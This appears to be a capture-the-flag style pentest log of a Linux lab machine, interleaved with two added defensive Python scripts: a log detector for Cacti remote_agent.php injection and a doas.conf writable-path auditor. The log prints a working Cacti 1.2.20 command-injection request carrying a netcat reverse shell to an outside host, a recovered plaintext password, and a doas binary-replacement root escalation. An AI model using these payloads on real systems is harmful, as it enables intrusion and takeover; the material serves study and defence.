Confusion
Pentest Log: 2025-09-07
Target Information
- Machine Name: Confusion
- IP Address: 192.168.219.99
- Operating System: Linux
ip=192.168.219.99
Enumeration
Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Open TCP ports: 22; 80, 443
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
Found a DNS name:
cacti-monitoring.confusion.pg
Visiting https://cacti-monitoring.confusion.pg shows:
Cacti version 1.2.20
Exploitation
Vulnerability Summary
- Service / Port: 443
- Vulnerability Type: RCE
Exploit Execution
Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/51166
Examined the exploit and replayed its request with Burp Suite Intruder:
GET /remote_agent.php?action=polldata&local_data_ids[]=1&host_id=1&poller_id=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.246%2080%20%3E%2Ftmp%2Ff HTTP/1.1
Host: cacti-monitoring.confusion.pg
Cookie: Cacti=fqb0e6fj54gek5tp2kq5003vp4; CactiDateTime=Mon%20Sep%2008%202025%2002%3A26%3A56%20GMT-0400%20(Eastern%20Daylight%20Time); CactiTimeZone=-240
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
X-Forwarded-For: 127.0.0.1
For both payload positions, use an integer list from 1 to 10.
python3 /home/kali/Documents/Shell\ Handler/penelope/penelope.py -p 80
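The request above is what a defender would want to catch in the web server logs, and it is what the Cacti upgrade removes. The following added example (not part of this log, and not Cacti project code) scans access-log lines and flags remote_agent.php requests whose poller_id or host_id carries shell metacharacters, or which present a loopback X-Forwarded-For from a non-loopback client. The log layout (combined format with the X-Forwarded-For header appended as a trailing quoted field) and every sample line are constructed for this example; the injected payload is shortened to `;id`.

```python
"""Flag Cacti remote_agent.php command-injection attempts in web access logs.

Added example; not from the pentest log and not Cacti code. The log layout
(combined format with X-Forwarded-For as a trailing quoted field) and all
sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)
# Characters that have no business in a numeric poller_id / host_id.
SHELL_META = re.compile(r"[;|&`$()<>\n]")
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample lines: a normal page view, a legitimate-looking poll,
# the injection pattern from the request above (payload shortened to ;id),
# and a request that only spoofs X-Forwarded-For.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Sep/2025:02:26:10 -0400] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0" "-"',
    '10.0.0.5 - - [07/Sep/2025:02:26:20 -0400] "GET /remote_agent.php?action=polldata&local_data_ids[]=1&host_id=1&poller_id=1 HTTP/1.1" 200 210 "-" "Mozilla/5.0" "-"',
    '192.168.45.246 - - [07/Sep/2025:02:26:56 -0400] "GET /remote_agent.php?action=polldata&local_data_ids[]=1&host_id=1&poller_id=%3Bid HTTP/1.1" 200 0 "-" "Mozilla/5.0" "127.0.0.1"',
    '203.0.113.9 - - [07/Sep/2025:02:27:03 -0400] "GET /remote_agent.php?action=polldata&host_id=1&poller_id=2 HTTP/1.1" 403 0 "-" "curl/8.0" "127.0.0.1"',
]


def analyze(line):
    """Return an alert dict for a suspicious remote_agent.php request, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/remote_agent.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    reasons = []
    for name in ("poller_id", "host_id"):
        for value in params.get(name, []):
            if SHELL_META.search(value):
                reasons.append(f"{name} contains shell metacharacters: {value!r}")
    xff = m["xff"]
    # The poller check trusts X-Forwarded-For, so a loopback value from a
    # remote client is itself a signal even when the parameters look clean.
    if xff in LOOPBACK and m["client"] not in LOOPBACK:
        reasons.append(f"X-Forwarded-For claims {xff} but the client is {m['client']}")
    if not reasons:
        return None
    return {"client": m["client"], "time": m["time"], "status": m["status"], "reasons": reasons}


def scan(lines):
    """Run analyze() over many lines and return only the alerts."""
    return [a for a in (analyze(line) for line in lines) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert['time']} {alert['client']} (HTTP {alert['status']})")
        for reason in alert["reasons"]:
            print("   ", reason)
```

Run against a real log, the script needs the X-Forwarded-For field logged (for Apache, a `%{X-Forwarded-For}i` entry in the LogFormat); without it only the metacharacter check fires.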
Privilege Escalation
Current Access
- User: www-data
- Groups: 33(www-data)
- Shell Type: reverse shell
Enumeration
Linpeas:
chmod +x linpeas.sh
./linpeas.sh
Found database credentials:
cactiuser:uTyWUHAdetb3O23aUEOo1KRg
The same password is reused for the james account:
su james
Rerunning linpeas as james shows a writable directory:
/usr/local/sbin
and a binary that doas permits james to run:
/usr/local/sbin/systeminfo
Privilege Escalation Exploit
Exploit Summary
- Technique Used: Doas Abuse
- Target Binary/Service: systeminfo
- Reference / Source: N/A
Exploit Steps
- Setup
mv /usr/local/sbin/systeminfo /usr/local/sbin/systeminfo.bak
vi /usr/local/sbin/systeminfo
#! /bin/bash
chmod +s /bin/bash
chmod +x /usr/local/sbin/systeminfo
- Smash to root
doas /usr/local/sbin/systeminfo
/bin/bash -p
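What made the escalation above possible is the combination of a doas rule pointing at a binary and a parent directory the permitted user can write to. The added example below (mine, not the lab's and not a doas project tool) parses a doas.conf, then walks each permitted command's path up to the filesystem root looking for world-writable or group-writable components, untrusted owners, or rules that permit any command. The doas.conf text and the staged directory tree are constructed, since the real host's doas.conf was not recorded; the `root` parameter lets a staged tree stand in for / so the audit can be exercised without touching the live system.

```python
"""Audit doas.conf for permitted commands that live in a writable location.

Added example, not from the pentest log. The doas.conf text and the staged
directory tree are constructed; the real host's doas.conf was not shown.
"""
import os
import re
import stat
import tempfile

# Subset of the doas.conf grammar (setenv {...} options are not handled):
#   permit|deny [nopass|nolog|persist|keepenv]... identity [as target] [cmd command [args ...]]
RULE_RE = re.compile(
    r"^(?P<action>permit|deny)"
    r"(?:\s+(?:nopass|nolog|persist|keepenv))*"
    r"\s+(?P<identity>\S+)"
    r"(?:\s+as\s+(?P<target>\S+))?"
    r"(?:\s+cmd\s+(?P<cmd>\S+))?"
    r"(?:\s+args\b.*)?\s*$"
)

# Constructed doas.conf that would explain the log; the real file was not shown.
EXAMPLE_CONF = """\
# let james run the status script as root without a password
permit nopass james as root cmd /usr/local/sbin/systeminfo
permit james cmd /usr/bin/id
permit keepenv bob
"""


def parse_doas_conf(text):
    """Return one dict per rule; comments and blank lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = RULE_RE.match(line)
        if m is None:
            rules.append({"raw": line, "error": "unparsed rule"})
            continue
        rules.append({"raw": line, "error": None, **m.groupdict()})
    return rules


def writable_findings(path, root="/", trusted_uids=frozenset({0})):
    """Reasons why `path` or any directory above it (up to `root`) could be
    modified by someone other than the trusted owners."""
    findings = []
    stop = os.path.abspath(root)
    cur = os.path.abspath(os.path.join(stop, path.lstrip("/")))
    while True:
        try:
            st = os.lstat(cur)
        except FileNotFoundError:
            findings.append(f"{cur}: does not exist (whoever can write the parent can create it)")
        else:
            mode = st.st_mode
            if st.st_uid not in trusted_uids:
                findings.append(f"{cur}: owned by uid {st.st_uid}, not a trusted owner")
            # A sticky world-writable directory (like /tmp) does not let other
            # users rename or remove entries they do not own, so it is not flagged.
            sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
            if mode & stat.S_IWOTH and not sticky_dir:
                findings.append(f"{cur}: world-writable")
            elif mode & stat.S_IWGRP and st.st_gid != 0:
                findings.append(f"{cur}: group-writable (gid {st.st_gid})")
        if cur == stop:
            return findings
        cur = os.path.dirname(cur)


def audit_doas(conf_text, root="/", trusted_uids=frozenset({0})):
    """Return (identity, cmd, findings) for each permit rule that looks abusable."""
    report = []
    for rule in parse_doas_conf(conf_text):
        if rule["error"]:
            report.append(("?", rule["raw"], [rule["error"]]))
        elif rule["action"] != "permit":
            continue
        elif rule["cmd"] is None:
            report.append((rule["identity"], None, ["rule permits any command"]))
        elif not rule["cmd"].startswith("/"):
            report.append((rule["identity"], rule["cmd"], ["command is not an absolute path; verify which binary actually runs"]))
        else:
            findings = writable_findings(rule["cmd"], root, trusted_uids)
            if findings:
                report.append((rule["identity"], rule["cmd"], findings))
    return report


def stage_example_tree(root):
    """Build a tree mirroring the log: /usr/local/sbin is world-writable, /usr/bin is not."""
    for rel, mode in (("usr", 0o755), ("usr/bin", 0o755), ("usr/local", 0o755), ("usr/local/sbin", 0o777)):
        os.makedirs(os.path.join(root, rel), exist_ok=True)
        os.chmod(os.path.join(root, rel), mode)
    for rel in ("usr/local/sbin/systeminfo", "usr/bin/id"):
        p = os.path.join(root, rel)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder body
        os.chmod(p, 0o755)


def run_example():
    """Audit EXAMPLE_CONF against a staged tree; the current uid stands in for root."""
    with tempfile.TemporaryDirectory() as root:
        stage_example_tree(root)
        return audit_doas(EXAMPLE_CONF, root, {os.getuid()})


if __name__ == "__main__":
    for identity, cmd, findings in run_example():
        print(f"{identity}: {cmd}")
        for f in findings:
            print("   ", f)
```

On a live host, `audit_doas(open("/etc/doas.conf").read())` with the defaults checks the real paths against root ownership; the expected remediation for the finding this example reproduces is to make /usr/local/sbin root-owned and 0755, and to keep doas rules pointed only at binaries in such directories.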